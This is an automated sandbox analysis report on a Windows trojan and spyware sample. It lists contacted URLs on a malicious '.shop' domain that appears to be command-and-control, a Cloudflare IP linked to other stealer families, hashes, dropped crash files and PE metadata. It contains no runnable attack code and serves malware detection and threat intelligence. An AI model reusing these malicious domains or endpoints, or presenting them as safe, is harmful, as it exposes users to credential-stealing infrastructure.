                            https://wagonglidemonkywo.shop/820qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.ecosia.org/newtab/20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://ac.ecosia.org/autocomplete?q=20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://wagonglidemonkywo.shop/S20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://wagonglidemonkywo.shop/apiy20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://x1.c.lencr.org/020qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://x1.i.lencr.org/020qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://support.microsof20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://wagonglidemonkywo.shop/$20qMFnd9tO.exe, 00000000.00000003.1647929936.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://wagonglidemonkywo.shop/apiM20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://wagonglidemonkywo.shop/d20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://wagonglidemonkywo.shop/c20qMFnd9tO.exe, 00000000.00000003.1655773543.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://wagonglidemonkywo.shop/a20qMFnd9tO.exe, 00000000.00000003.1670168050.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670293622.0000000002DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://support.mozilla.org/products/firefoxgro.all20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://wagonglidemonkywo.shop/apiyi20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wagonglidemonkywo.shop/apiH20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            172.67.221.128
                                            		wagonglidemonkywo.shopUnited States
                                            		13335CLOUDFLARENETUStrue

                                            General Information

                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1417393
                                            Start date and time:2024-03-29 08:10:06 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 4m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:20qMFnd9tO.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:0f4a71f80cd80f172817f116318e3fca.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 93%
                                            • Number of executed functions: 45
                                            • Number of non-executed functions: 178
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.42.65.92
                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtCreateFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            08:10:52API Interceptor7x Sleep call for process: 20qMFnd9tO.exe modified
                                            08:11:10API Interceptor1x Sleep call for process: WerFault.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUS88Oj06xDol.exeGet hashmaliciousRisePro StealerBrowse
                                            • 104.26.5.15
                                            SecuriteInfo.com.Win32.PWSX-gen.9732.1319.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 104.26.12.205
                                            SecuriteInfo.com.FileRepMalware.14270.3068.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.135.233
                                            SecuriteInfo.com.FileRepMalware.14270.3068.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.133.233
                                            https://1drv.ms/f/s!AsWd4BQz7qwJa8oeifBH2QA-eNgGet hashmaliciousHTMLPhisherBrowse
                                            • 172.67.131.219
                                            https://jpn104.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-22952Get hashmaliciousTechSupportScamBrowse
                                            • 172.67.208.186
                                            https://jpn104.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-24980Get hashmaliciousTechSupportScamBrowse
                                            • 104.21.53.38
                                            https://jpn104-secondary.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-25074Get hashmaliciousTechSupportScamBrowse
                                            • 104.21.53.38
                                            https://jpn104-secondary.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-24910Get hashmaliciousTechSupportScamBrowse
                                            • 172.67.208.186
                                            https://depl.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                            • 162.247.243.29

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            a0e9f5d64349fb13191bc781f81f42e188Oj06xDol.exeGet hashmaliciousRisePro StealerBrowse
                                            • 172.67.221.128
                                            uQeIMs91Vh.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                            • 172.67.221.128
                                            Zam#U00f3wienie_27900045542300.CMD.cmdGet hashmaliciousDBatLoader, RemcosBrowse
                                            • 172.67.221.128
                                            jUlAlD6KHz.exeGet hashmaliciousRisePro StealerBrowse
                                            • 172.67.221.128
                                            Document 20240327_1188908_1188909.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 172.67.221.128
                                            Iv88OQbqpE.exeGet hashmaliciousRisePro StealerBrowse
                                            • 172.67.221.128
                                            file.exeGet hashmaliciousRisePro StealerBrowse
                                            • 172.67.221.128
                                            BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                            • 172.67.221.128
                                            6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                            • 172.67.221.128
                                            892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                            • 172.67.221.128

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_20qMFnd9tO.exe_539efc4882d7e5893b644cdf6405ac0f098affe_1c3fac94_39bd28e0-c81e-42b0-9cd8-4a3d051f6be2\Report.wer

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):0.9924166783473398
                                            Encrypted:false
                                            SSDEEP:384:MY8shNJzvWXwKo49DoEdjlzuiFPY4IO8nzj:MSM3o491jlzuiFPY4IO8
                                            MD5:7B6AD3B21D58B8F3039B1D91179246D3
                                            SHA1:8B6344A05586022DE744A6D194B27634A4FD7944
                                            SHA-256:83ADC4660FE534271CF4E28FBCABF9F6B8FFFDDA2F9BF1F48BA13914BFCE49D6
                                            SHA-512:981D8E265C96C6C85CAC5F9B8CB444B099077A20E149436F8BE987B034AB0DB331799CB483E61894526F568789558958FE0929C2EF5D2F4801A245F9791D7486
                                            Malicious:false
                                            Reputation:low
                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.1.6.9.8.6.0.1.7.0.6.1.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.1.6.9.8.6.0.5.9.2.4.8.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.b.d.2.8.e.0.-.c.8.1.e.-.4.2.b.0.-.9.c.d.8.-.4.a.3.d.0.5.1.f.6.b.e.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.1.c.3.3.4.6.-.6.2.6.d.-.4.f.c.8.-.8.6.0.c.-.4.8.c.8.0.e.c.0.c.c.2.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.0.q.M.F.n.d.9.t.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.8.4.-.0.0.0.1.-.0.0.1.4.-.a.e.a.e.-.0.c.3.b.a.8.8.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.e.2.a.2.9.8.f.0.3.9.5.1.9.4.f.1.5.0.f.0.f.f.a.8.a.8.4.f.b.c.0.0.0.0.0.f.f.f.f.!.0.0.0.0.c.f.0.d.0.1.4.f.1.9.1.4.0.c.6.f.b.8.6.b.e.e.e.b.0.7.8.c.c.3.c.c.9.f.e.9.9.a.7.7.!.2.0.q.M.F.n.d.9.t.O...e.x.e.....T.a.r.g.e.t.A.p.p.

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER15A5.tmp.dmp

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Mini DuMP crash report, 15 streams, Fri Mar 29 07:11:00 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):48266
                                            Entropy (8bit):2.7196067945736297
                                            Encrypted:false
                                            SSDEEP:192:sJGqqXfHVF4qhfODBILsYnFlFdQ18m/bS1KYrMi/8I25os0oQ11:AGHbtWDBILvnFlFdCR7i/z2O7/7
                                            MD5:09C2A89E1886E53FD568DEBF7FC4D80F
                                            SHA1:4CCDB54CF5057B735C5CADF3055CFB40E1FDB5AE
                                            SHA-256:C19931CCEC92B348B1E7FCB6609F798C5B20B8D38CD7CE2ED636F08114BFB1D0
                                            SHA-512:BED119A26EB27D647B4AA48109F6916590C9EC7B29323ABBDC5ED3528170E197BA33FEDE9A48A7CC0DD8FDCC870F605EBC018F6CB8F75CF73DC208E3C57DBA2C
                                            Malicious:false
                                            Reputation:low
                                            Preview:MDMP..a..... ........i.f............4...............H.......t...............Z1..........`.......8...........T...........P=..:...........` ..........L"..............................................................................eJ......."......GenuineIntel............T...........zi.f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1691.tmp.WERInternalMetadata.xml

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8318
                                            Entropy (8bit):3.6956557139052757
                                            Encrypted:false
                                            SSDEEP:192:R6l7wVeJ/AD6M6Y9GSUFygmftaA5hoVpDT89bB8sf0rm:R6lXJ/E6M6YcSUFygmftaA5qEBPfV
                                            MD5:6C71A4641AFA9D9422D6D81CDEAE2AEE
                                            SHA1:955D58DD76BEEB596E3B85F4046618EF10FF3A4E
                                            SHA-256:CF85A1FCB3C10CE4750BB91A4D65494E93AB44BCF0B0427C5BE139215CECFE83
                                            SHA-512:D099937AD58DEAC559569C5980641AF572B4768AED5A2E8D1ADBFB7E77B12D5A95252EA3EEFE31B1D43A67CAFBD6B99EF81C0E74886C5CDFCC301AB7ADAA8E59
                                            Malicious:false
                                            Reputation:low
                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.5.6.<./.P.i.

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER16D0.tmp.xml

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4579
                                            Entropy (8bit):4.44852050202713
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zsvJg77aI9fsWpW8VYPYm8M4JTlF4h+q82P0jRfTC3d:uIjfRI7RF7VbJch/0VfTC3d
                                            MD5:474D862B93CD9EB3C585883FF4C90F5B
                                            SHA1:8744A591FE35A31270FB825AC7E99DE1643502F6
                                            SHA-256:C978552D370FE6A13189229E85A5AFDF812830054C8E4AC39CF6478ED814EA10
                                            SHA-512:475B752091CF3C54C8D2EBCCE327E844DDC8746C59C01A8E3DBB61ABAD9FD46F190A5CB98CF09AE88BDCEF7BD8D31BF81A45454EDFB6E43676AA3022274FFB96
                                            Malicious:false
                                            Reputation:low
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="256213" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                            C:\Windows\appcompat\Programs\Amcache.hve

                                            Download File
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.465423210865031
                                            Encrypted:false
                                            SSDEEP:6144:yIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNodwBCswSbf:3XD94+WlLZMM6YFHW+f
                                            MD5:1DD672031F174B3F728ECFDD8635986B
                                            SHA1:FC2CF2991EDB1E034961DD75B9A06F985BFD4E07
                                            SHA-256:02676B069FB0023820B2C40E183D9295F0E5F5CC767A76A9E694867707C0C991
                                            SHA-512:27527F56351A94F510837013F189E83A9989BC266B8743F52D4974F3DEFAAD50B7684C742436503CD6D144C89164425860C00A1F468E6FF6A24448EE6F5F2B13
                                            Malicious:false
                                            Reputation:low
                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..@..................................................................................................................................................................................................................................................................................................................................................t........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.043014706881447
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:20qMFnd9tO.exe
                                            File size:327'680 bytes
                                            MD5:0f4a71f80cd80f172817f116318e3fca
                                            SHA1:cf0d014f19140c6fb86beeeb078cc3cc9fe99a77
                                            SHA256:fe2ad4001c817a77de2e7d4ca694833fef66c99beee799333fc84e74da4cad5e
                                            SHA512:02686e82b3377a4992dcd6eadef59ed8a6c662ccbff5ba62b26e3fcaa4055de62e105f3fbcf6145f7db32ee10f07a08eeee14b4c5cbf885c0ec805ce429c684f
                                            SSDEEP:6144:Z1TgTn1Xa1/0LgICwFehTyUu/N90kiPSx1:4T1Xa07CwYTyUIN6kii
                                            TLSH:FE64E012B2A0D039D3575A31F834CAE10AFE7CE17A75418B77942B3A6E703D14A3775A
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Y...Y...Y...6.'.A...6...-...6...~...P.*.P...Y...2...6...X...6.#.X...6.$.X...RichY...................PE..L...6.+d...........

                                            File Icon

                                            Icon Hash:13694d4529170717

                                            Static PE Info

                                            General

                                            Entrypoint:0x4028b2
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x642B9336 [Tue Apr 4 03:02:14 2023 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:257369aa226cb4b09879eb1a5063d4d0

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F8BD4B7B070h
                                            jmp 00007F8BD4B76D1Eh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 20h
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            push edi
                                            push 00000008h
                                            pop ecx
                                            mov esi, 00411270h
                                            lea edi, dword ptr [ebp-20h]
                                            rep movsd
                                            mov dword ptr [ebp-08h], eax
                                            mov eax, dword ptr [ebp+0Ch]
                                            pop edi
                                            mov dword ptr [ebp-04h], eax
                                            pop esi
                                            test eax, eax
                                            je 00007F8BD4B76E9Eh
                                            test byte ptr [eax], 00000008h
                                            je 00007F8BD4B76E99h
                                            mov dword ptr [ebp-0Ch], 01994000h
                                            lea eax, dword ptr [ebp-0Ch]
                                            push eax
                                            push dword ptr [ebp-10h]
                                            push dword ptr [ebp-1Ch]
                                            push dword ptr [ebp-20h]
                                            call dword ptr [004110B8h]
                                            leave
                                            retn 0008h
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000328h
                                            mov dword ptr [00448358h], eax
                                            mov dword ptr [00448354h], ecx
                                            mov dword ptr [00448350h], edx
                                            mov dword ptr [0044834Ch], ebx
                                            mov dword ptr [00448348h], esi
                                            mov dword ptr [00448344h], edi
                                            mov word ptr [00448370h], ss
                                            mov word ptr [00448364h], cs
                                            mov word ptr [00448340h], ds
                                            mov word ptr [0044833Ch], es
                                            mov word ptr [00448338h], fs
                                            mov word ptr [00448334h], gs
                                            pushfd
                                            pop dword ptr [00448368h]
                                            mov eax, dword ptr [ebp+00h]
                                            mov dword ptr [0044835Ch], eax
                                            mov eax, dword ptr [ebp+04h]
                                            mov dword ptr [00448360h], eax
                                            lea eax, dword ptr [ebp+08h]

                                            Rich Headers

                                            Programming Language:
                                            • [ASM] VS2010 build 30319
                                            • [ C ] VS2010 build 30319
                                            • [C++] VS2010 build 30319
                                            • [IMP] VS2008 SP1 build 30729
                                            • [RES] VS2010 build 30319
                                            • [LNK] VS2010 build 30319

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x456240x64.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x14b0000x7fa8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x110000x190.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xfe030x100006173bb3398a7dfd89c1ebab6d5098a1bFalse0.5941009521484375data6.640039901281461IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x110000x34f4a0x35000f00c53c350f43c08d0575548128e8555False0.8214226488797169data7.280492539967257IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x460000x1042e40x2c0072a7b0c0760143d0d7d6b90b9fe0db88False0.15793678977272727data1.8740820881414495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x14b0000x7fa80x8000ada8c25a9f038add6de88e59ee94f67cFalse0.548614501953125data5.566127611494106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_CURSOR0x151d080x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                            RT_CURSOR0x151e500x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.75
                                            RT_ICON0x14b4900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SpanishPeru0.43336886993603413
                                            RT_ICON0x14c3380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SpanishPeru0.5717509025270758
                                            RT_ICON0x14cbe00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SpanishPeru0.6319124423963134
                                            RT_ICON0x14d2a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SpanishPeru0.7109826589595376
                                            RT_ICON0x14d8100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SpanishPeru0.5571576763485477
                                            RT_ICON0x14fdb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SpanishPeru0.5898217636022514
                                            RT_ICON0x150e600x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SpanishPeru0.6717213114754098
                                            RT_ICON0x1517e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SpanishPeru0.7092198581560284
                                            RT_DIALOG0x1521900x98data0.7631578947368421
                                            RT_STRING0x1522280xeedata0.5588235294117647
                                            RT_STRING0x1523180x6e2data0.42622020431328034
                                            RT_STRING0x152a000x160data0.4971590909090909
                                            RT_STRING0x152b600x448data0.458029197080292
                                            RT_ACCELERATOR0x151cc80x40data0.859375
                                            RT_GROUP_CURSOR0x151e380x14data1.15
                                            RT_GROUP_CURSOR0x151f880x14Lotus unknown worksheet or configuration, revision 0x11.3
                                            RT_GROUP_ICON0x151c500x76dataSpanishPeru0.6610169491525424
                                            RT_VERSION0x151fa00x1f0MS Windows COFF PowerPC object file0.5745967741935484

                                            Imports

                                            DLLImport
